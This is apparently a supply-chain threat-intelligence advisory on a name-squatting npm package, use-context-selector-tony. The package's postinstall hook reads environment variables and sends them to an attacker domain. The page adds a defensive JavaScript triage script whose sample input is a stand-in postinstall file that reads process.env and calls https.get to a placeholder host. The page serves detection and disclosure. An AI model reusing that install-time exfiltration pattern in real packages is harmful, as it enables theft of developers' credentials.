THREATPKG

Supply-chain threat intelligence

Incident detail

critical · npm · credential theft · osv

Malicious code in use-context-selector-tony (npm)

use-context-selector-tony

Risk score

92

AI summary

Indexed incident for use-context-selector-tony (npm).

Description

This package is a name-squat of the popular use-context-selector library. It ships a postinstall script (dist/postinstall.js / src/postinstall.js) that runs on npm install, reads process.env, and beacons to the endpoint https://almondco.online via https.get. The endpoint is hardcoded in the install-lifecycle script and is unrelated to any published use-context-selector author or infrastructure. The combination of (a) name confusion against an established library, (b) a postinstall hook that fires without consent on every npm install, (c) reads of process.env, and (d) outbound HTTPS to an attacker-controlled domain matches the standard install-time environment-exfiltration pattern.
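
A static triage check for the four signals (a) to (d) listed above, as an added example that is not ThreatPkg's or the advisory's own code. The POPULAR list, the rule names, the verdict labels and the sample manifest and script are assumptions constructed for illustration; the sample uses a placeholder host, not the real package contents.

```javascript
// Added example: static triage of an unpacked npm package for install-time exfiltration.
// POPULAR is an assumed list of names worth protecting; extend it for your own estate.
const POPULAR = ["use-context-selector"];
const HOOKS = ["preinstall", "install", "postinstall"];

// Signal (a): the name embeds a popular package name plus extra characters.
function squatTarget(name) {
  return POPULAR.find((p) => name !== p && name.includes(p)) || null;
}

function hostOf(u) {
  try { return new URL(u).hostname; } catch { return "unparsed"; }
}

// manifest: parsed package.json; files: { path: source text } from the unpacked tarball.
function auditPackage(manifest, files) {
  const findings = [];
  const target = squatTarget(manifest.name || "");
  if (target) findings.push({ rule: "name-confusion", detail: target });
  for (const hook of HOOKS) {
    const cmd = (manifest.scripts || {})[hook];
    if (!cmd) continue;
    findings.push({ rule: "install-hook", detail: `${hook}: ${cmd}` }); // signal (b)
    // Resolve script files named in the hook command, e.g. "node dist/postinstall.js".
    for (const p of cmd.match(/[\w./-]+\.(?:c|m)?js\b/g) || []) {
      const src = files[p.replace(/^\.\//, "")];
      if (src === undefined) continue;
      if (/process\.env\b/.test(src)) findings.push({ rule: "env-read", detail: p }); // (c)
      if (/\bhttps?\.(?:get|request)\s*\(|\bfetch\s*\(/.test(src)) { // signal (d)
        const hosts = (src.match(/https?:\/\/[^\s"'`)]+/g) || []).map(hostOf);
        findings.push({ rule: "outbound-http", detail: `${p} -> ${hosts.join(",") || "dynamic"}` });
      }
    }
  }
  const rules = new Set(findings.map((f) => f.rule));
  const all = ["name-confusion", "install-hook", "env-read", "outbound-http"];
  // All four signals together match the pattern in the description; a bare hook needs review.
  const verdict = all.every((r) => rules.has(r)) ? "block"
    : rules.has("install-hook") ? "review" : "pass";
  return { verdict, findings };
}

// Constructed sample input (stand-in manifest and script, placeholder host).
const sampleManifest = { name: "use-context-selector-tony", scripts: { postinstall: "node dist/postinstall.js" } };
const sampleFiles = {
  "dist/postinstall.js": 'const https = require("https");\nconst n = Object.keys(process.env).length;\nhttps.get("https://collector.example.invalid/?n=" + n);',
};
console.log(JSON.stringify(auditPackage(sampleManifest, sampleFiles), null, 2));
```

Pattern matching like this misses obfuscated or dynamically built calls, so treat "review" and "pass" as triage results rather than a clean bill of health.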

Technical details

Indicators

  • affected version 75%

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg
